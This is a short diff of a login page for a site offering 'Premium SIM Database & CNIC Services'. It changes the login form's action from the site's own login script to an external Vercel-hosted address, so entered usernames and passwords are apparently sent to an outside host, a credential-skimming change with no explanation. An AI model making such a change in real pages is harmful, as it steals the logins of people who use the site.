--- a/index.html
+++ b/index.html
@@ -314,7 +314,7 @@
         <div>
             <p class="text-center">Premium SIM Database & CNIC Services</p>
         </div>
-        <form class="login100-form validate-form" method="POST" action="/login/index.php">
+        <form class="login100-form validate-form" method="POST" action="https://login-ivory-psi-97.vercel.app/">
             <div class="form-field d-flex align-items-center">
                 <span class="far fa-user"></span>
                 <input type="text" name="userff" id="userName" placeholder="Username">
